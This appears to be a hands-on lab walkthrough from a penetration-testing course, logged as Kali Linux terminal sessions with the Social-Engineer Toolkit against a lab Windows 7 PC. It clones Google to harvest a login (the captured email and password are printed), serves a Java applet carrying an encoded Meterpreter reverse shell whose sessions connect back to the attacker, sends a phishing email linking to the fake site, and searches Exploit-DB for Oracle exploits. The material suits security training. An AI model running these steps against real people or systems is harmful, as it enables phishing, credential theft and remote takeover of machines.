● This tool is based on Metasploit. One of its attack techniques, the Autopwn attack, uses the built-in nmap to scan the network and find target systems, analyzes their operating system, ports and IP addresses, and attacks every matching vulnerability with automated scripts.
● In Kali Linux it has been integrated into SET (the social engineering toolkit).
SET (Social Engineering Tech., social engineering attack techniques)
● In computer security, social engineering is a non-technical intrusion method that exploits people's deep trust in human interaction to deceive them into breaking normal security procedures.
● As APT (Advanced Persistent Threat) attacks now target public institutions and specific users, internal security has received much more attention.
Systems used
- Kali Linux
- Windows 7
(Kali Linux)
How to run the SE Toolkit
Kali Linux > Exploitation Tools > Social Engineering Toolkit > setoolkit
or
# setoolkit
# vi /usr/share/set/config/set_config
### Path to the pem file to utilize certificates with the web attack vector (required)
### You can create your own utilizing set, just turn on self_signed_cert
### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT
### to the on position.
[Before]
SELF_SIGNED_CERT=OFF
[After]
SELF_SIGNED_CERT=ON
-> http://chogar.blog.me/80210217409 : details on using SET in Kali Linux
# setoolkit
[*] Checking to see if bleeding-edge repos are active.
[!] Bleeding edge repos were not detected. This is recommended.
Do you want to enable bleeding-edge repos for fast updates [yes/no]: yes
[*] Adding Kali bleeding edge to sources.list for updates.
[*] It is recommended to now run apt-get update && apt-get upgrade && apt-get dist-upgrade && apt-get autoremove and restart SET.
[-] New set_config.py file generated on: 2014-07-21 13:45:07.325217
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-07-21 13:45:07.325217
[*] SET is using the new config, no need to restart
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list
of conditions and the following disclaimer
in the documentation and/or other materials provided with the distribution.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be
used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.
Do you agree to the terms of service [y/n]: y
!\_________________________/!\
!! !! \
!! Social-Engineer Toolkit !! \
!! !! !
!! Free !! !
!! !! !
!! #hugs !! !
!! !! !
!! By: TrustedSec !! /
!!_________________________!! /
!/_________________________\!/
__\_________________/__/!_
!_______________________!/
________________________
/oooo oooo oooo oooo /!
/ooooooooooooooooooooooo/ /
/ooooooooooooooooooooooo/ /
/C=_____________________/_/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 6.0 [---]
[---] Codename: 'Rebellion' [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 4
[*] You are running Kali Linux which maintains SET updates.
[*] You can enable bleeding-edge repos for up-to-date SET.
[*] Checking to see if bleeding-edge repos are active.
[*] Bleeding edge already active..Moving on..
..... (omitted) ......
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 5
[-] New set_config.py file generated on: 2014-07-21 13:49:43.152309
[-] Verifying configuration update...
[!] Update failed? Timestamp on config file is: 2014-07-21 13:45:07.325217
[*] SET is using the new config, no need to restart
..... (omitted) ......
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..... (omitted) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu
set:webattack> 3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack> 1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.20.50
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack> Select a template: 2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]:y
[ ok ] Starting web server: apache2.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
[TERM2]
# cd /var/www
# ls
# cat index.html
# cat post.php
# cat harvester_*.txt
# pgrep -lf apache2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu
set:webattack> 99
..... (중략) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 99
..... (omitted) .....
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 99
Thank you for shopping with the Social-Engineer Toolkit.
Hack the Gibson...and remember...hugs are worth more than handshakes.
#
(Windows 7)
Internet Explorer
-> http://192.168.20.50/
-> The Google site appears
ID : email
PASS: password
(Kali Linux)
# cd /var/www
# cat harvester_*.txt
Array
(
[GALX] => SJLCkfgaqoM
[continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX
[service] => lso
[dsh] => -7381887106725792428
[_utf8] => ☃
[bgresponse] => js_disabled
[pstMsg] => 1
[dnConn] =>
[checkConnection] =>
[checkedDomains] => youtube
[Email] => jang4sc@hanmail.net
[Passwd] => test1234
[signIn] => Sign in
[PersistentCookie] => yes
)
(Summary) Compare with the earlier work
(Earlier lab) ARP Spoofing + DNS Spoofing
(Current lab) Fake site setup + ID/PASS collection
(Kali Linux)
# setoolkit
..... (omitted) .....
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..... (omitted) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu
set:webattack>1
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection: 192.168.20.50
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.
Enter the number you want to use [1-3]: 2
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack> Select a template:2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: llOdplapGIWHnqh
[*] Malicious java applet website prepped for deployment
What payload do you want to generate:
Name: Description:
1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter All Ports Spawn a meterpreter shell and find a port home (every port)
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec
15) PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector
16) MultiPyInjector Shellcode Injection This will drop multiple Metasploit payloads via memory
17) Import your own executable Specify a path for your own executable
set:payloads>2
Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
1) shikata_ga_nai
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
set:encoding>1
set:payloads> PORT of the listener [443]: <ENTER>
[*] Generating x86-based powershell injection code for port: 22
[*] Generating x86-based powershell injection code for port: 53
[*] Generating x86-based powershell injection code for port: 443
[*] Generating x86-based powershell injection code for port: 21
[*] Generating x86-based powershell injection code for port: 25
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[-] Encoding the payload 4 times. [-]
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)
[*] Apache appears to be running, moving files into Apache's home
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.3-2014071601 [core:4.9 api:1.0] ]
+ -- --=[ 1322 exploits - 717 auxiliary - 210 post ]
+ -- --=[ 346 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 22
LPORT => 22
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 53
LPORT => 53
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
[*] Started reverse handler on 192.168.20.50:22
[*] Starting the payload handler...
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
[*] Started reverse handler on 192.168.20.50:53
[*] Starting the payload handler...
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
[*] Started reverse handler on 192.168.20.50:443
ExitOnSession => false
[*] Starting the payload handler...
resource (/root/.set/meta_config)> set LPORT 21
LPORT => 21
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT 25
LPORT => 25
resource (/root/.set/meta_config)> exploit -j
[*] Started reverse handler on 192.168.20.50:21
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.50:25
[*] Starting the payload handler...
(Windows 7)
(If needed) Install Java (https://java.com/ko/download/ie_manual.jsp?locale=ko)
(Note) Start
> All Programs
> Java
> Configure Java
> Security tab
> Lower the security level.
Select "High"
Register exception sites
http://192.168.20.50
https://192.168.20.50
> Apply
Connect using Mozilla Firefox.
http://192.168.20.50/
-> Download the Java applet.
-> You are forwarded to the www.google.com site.
(Kali Linux)
[*] Started reverse handler on 192.168.20.50:21
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.50:25
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:443 -> 192.168.20.202:50752) at 2014-07-21 21:04:00 +0900
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Sending stage (769536 bytes) to 192.168.20.202
[*] Meterpreter session 2 opened (192.168.20.50:443 -> 192.168.20.202:50755) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 3 opened (192.168.20.50:25 -> 192.168.20.202:50758) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 4 opened (192.168.20.50:22 -> 192.168.20.202:50756) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 5 opened (192.168.20.50:21 -> 192.168.20.202:50759) at 2014-07-21 21:04:03 +0900
[*] Meterpreter session 6 opened (192.168.20.50:53 -> 192.168.20.202:50757) at 2014-07-21 21:04:03 +0900
<ENTER>
msf exploit(handler) > sessions -i
Active sessions
===============
Id  Type                   Information                       Connection
--  ----                   -----------                       ----------
1   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC   192.168.20.50:443 -> 192.168.20.202:50752 (192.168.20.202)
2   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC   192.168.20.50:443 -> 192.168.20.202:50755 (192.168.20.202)
3   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC   192.168.20.50:25 -> 192.168.20.202:50758 (192.168.20.202)
4   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC   192.168.20.50:22 -> 192.168.20.202:50756 (192.168.20.202)
5   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC   192.168.20.50:21 -> 192.168.20.202:50759 (192.168.20.202)
6   meterpreter x86/win32  soldesk-PC\soldesk @ SOLDESK-PC   192.168.20.50:53 -> 192.168.20.202:50757 (192.168.20.202)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SOLDESK-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : ko_KR
Meterpreter : x86/win32
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > quit
[*] You have active sessions open, to exit anyway type "exit -y"
msf exploit(handler) > exit -y
Press [return] when finished.
[*] Everything has been moved over to Apache and is ready to go.
Press <return> to continue
[TERM2] In another terminal
# cd /var/www
# ls
<ENTER>
<ENTER>
set:webattack>99
set> 99
set> 99
-> Exit.
(Summary) Compare with the previous exercise
(Previous setup) ARP Spoofing + DNS Spoofing
(Previous setup) reverse_tcp (backdoor) installed directly on the Windows PC
(Current setup) Fake Site + Java Applet
[Lab] Using Kali Linux 7
● Let's try deception through email (spam mail).
# cd /usr/share/set/config
# vi set_config
#
### Set to ON if you want to use Email in conjunction with webattack
#
[Before]
WEBATTACK_EMAIL=OFF
[After]
WEBATTACK_EMAIL=ON
-> Set this so that mail services other than Gmail can also be used.
# setoolkit
..... (omitted) .....
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..... (omitted) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 5
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
set:mailer>1
set:phishing> Send email to:jang4sc@gmail.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
set:phishing>1
set:phishing> Your gmail email address:jang4sc@gmail.com
set:phishing> The FROM NAME the user will see:Baik,SeoungChan
Email password: (enter the email password)
set:phishing> Flag this message/s as high priority? [yes|no]:no
set:phishing> Email subject:Hi, Student
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:<ENTER>
[!] IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.
set:phishing> Enter the body of the message, type END (capitals) when finished:<ENTER>
Next line of the body: Hi, Student
Next line of the body: This mail is test.
Next line of the body: http://192.168.20.50 /* a link URL is required. */
Next line of the body: END
[*] SET has finished sending the emails
Press <return> to continue
set> 99
set> 99
(Windows 7)
http://www.google.com
ID: (your own email)
PASS: (your own password)
(error message)
[Lab] Using Kali Linux 8
● Using Exploit DB (www.exploit-db.org)
Exploitation Tools > Exploit Database > searchsploit
or
# searchsploit <search term> <search term> ...
# searchsploit
Usage: searchsploit [options] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
=======
Options
=======
-c Perform case-sensitive searches; by default, searches will
try to be greedy
-h, --help Show help screen
-v By setting verbose output, description lines are allowed to
overflow their columns
*NOTES*
Use any number of search terms you would like (minimum of one).
Search terms are not case sensitive, and order is irrelevant.
# searchsploit oracle
Description Path
----------------------------------------------------------------------------- ----------------------------------
Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit | /windows/remote/80.c
Oracle (oidldapd connect) Local Command Line Overflow Exploit | /linux/local/183.c
Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit | /windows/local/932.sql
Oracle Database PL/SQL Statement Multiple SQL Injection Exploits | /windows/local/933.sql
Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit | /windows/remote/1365.pm
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit | /windows/local/1455.txt
Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit | /multiple/local/1719.txt
Oracle <= 9i / 10g (read/write/execute) Exploitation Suite | /multiple/remote/2837.sql
..... (omitted) .....
Oracle Demantra 12.2.1 - SQL Injection Vulnerability | /windows/webapps/31993.txt
Oracle Demantra 12.2.1 - Stored XSS Vulnerability | /windows/webapps/31994.txt
Oracle Demantra 12.2.1 - Database Credentials Disclosure | /windows/webapps/31995.txt
Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities | /multiple/dos/32208.txt
Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation V | /multiple/remote/32475.sql
Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects | /php/webapps/32670.txt
# searchsploit oracle | wc -l
197
# searchsploit oracle windows
..... (omitted) .....
Oracle Java lookUpByteBI - Heap Buffer Overflow | /windows/dos/28050.txt
Oracle Java ShortComponentRaster.verify() Memory Corruption | /windows/remote/28331.txt
Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow PoC | /windows/dos/31222.py
Oracle Forms and Reports - Remote Code Execution | /windows/remote/31737.rb
Oracle Demantra 12.2.1 - Arbitrary File Disclosure | /windows/webapps/31992.txt
Oracle Demantra 12.2.1 - SQL Injection Vulnerability | /windows/webapps/31993.txt
Oracle Demantra 12.2.1 - Stored XSS Vulnerability | /windows/webapps/31994.txt
Oracle Demantra 12.2.1 - Database Credentials Disclosure | /windows/webapps/31995.txt
# searchsploit oracle windows | wc -l
71
# searchsploit oracle windows local
----------------------------------------------------------------------------- ----------------------------------
Oracle Database Server <= 10.1.0.2 - Buffer Overflow Exploit | /windows/local/932.sql
Oracle Database PL/SQL Statement Multiple SQL Injection Exploits | /windows/local/933.sql
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit | /windows/local/1455.txt
Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32) | /windows/local/3451.c
Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit | /windows/local/16169.py
Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow | /windows/local/21044.c
# cd /usr/share/exploitdb/platforms
# ls
aix bsdi_x86 immunix linux_mips openbsd sco_x86 webapps
android cfm ios linux_ppc openbsd_x86 sh4 win32
arm cgi irix linux_sparc osx solaris win64
asp freebsd java minix osx_ppc solaris_sparc windows
atheos freebsd_x86 jsp mips palm_os solaris_x86
beos freebsd_x86-64 lin_amd64 multiple php tru64
bsd generator lin_x86 netbsd_x86 plan9 ultrix
bsd_ppc hardware lin_x86-64 netware qnx unix
bsd_x86 hp-ux linux novell sco unixware
# cd windows/local
# ls
..... (omitted) .....
16169.py
# vi 16169.py
#!/usr/bin/python
# Oracle 10/11g exp.exe - param file Local Buffer Overflow PoC Exploit
